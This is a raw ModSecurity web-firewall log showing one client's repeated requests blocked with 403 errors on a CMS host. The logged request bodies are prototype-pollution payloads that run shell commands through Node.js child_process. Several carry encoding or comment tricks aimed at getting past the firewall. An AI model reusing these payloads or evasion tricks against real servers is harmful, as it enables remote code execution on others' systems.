"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmz7xQSOrq_iRTM7dqcwAAAQ4"] [Sun Apr 05 15:42:39.831026 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:46154] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmz7xQSOrq_iRTM7dqdQAAARY"] [Sun Apr 05 15:42:39.832552 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:46178] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJmz5c83uMXRUE9zvQTTgAAAcU"] [Sun Apr 05 15:42:39.832837 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:46130] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmz7xQSOrq_iRTM7dqbwAAAQQ"] [Sun Apr 05 15:42:39.845377 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:46150] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJmz7xQSOrq_iRTM7dqdgAAAQI"] [Sun Apr 05 15:42:39.850334 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:46186] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmz5c83uMXRUE9zvQTTwAAAdY"] [Sun Apr 05 15:42:39.852706 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:46192] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz5c83uMXRUE9zvQTUAAAAcM"] [Sun Apr 05 15:42:39.902333 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:46220] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmz7xQSOrq_iRTM7dqdAAAAQY"] [Sun Apr 05 15:42:39.943671 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:46206] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJmz7xQSOrq_iRTM7dqeQAAAQo"] [Sun Apr 05 15:42:40.023974 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:46226] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmz5c83uMXRUE9zvQTUQAAAdc"] [Sun Apr 05 15:42:44.976186 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:46236] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJm1LxQSOrq_iRTM7dqoAAAAQo"] [Sun Apr 05 15:42:44.976439 2026] [:error] [pid 1306:tid 1320] [client 172.94.9.253:46278] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1IRhslBlnapNAUOXmAAAAAM"] [Sun Apr 05 15:42:44.976922 2026] [:error] [pid 31198:tid 31253] [client 172.94.9.253:46316] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1DT5TgrBR8xRnfXBKQAAAUE"] [Sun Apr 05 15:42:44.977210 2026] [:error] [pid 1503:tid 1533] [client 172.94.9.253:46290] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJm1EI7AjfUQYCN-J7D4QAAANU"] [Sun Apr 05 15:42:44.978010 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:46268] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJm1Jc83uMXRUE9zvQTZgAAAcs"] [Sun Apr 05 15:42:44.978413 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:46326] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1Jc83uMXRUE9zvQTZwAAAdQ"] [Sun Apr 05 15:42:44.992197 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:46272] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1LxQSOrq_iRTM7dqogAAAQQ"] [Sun Apr 05 15:42:44.992208 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:46242] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1LxQSOrq_iRTM7dqoQAAARY"] [Sun Apr 05 15:42:44.992442 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:46252] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1Jc83uMXRUE9zvQTaAAAAdg"] [Sun Apr 05 15:42:45.003935 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:46306] [client 172.94.9.253] 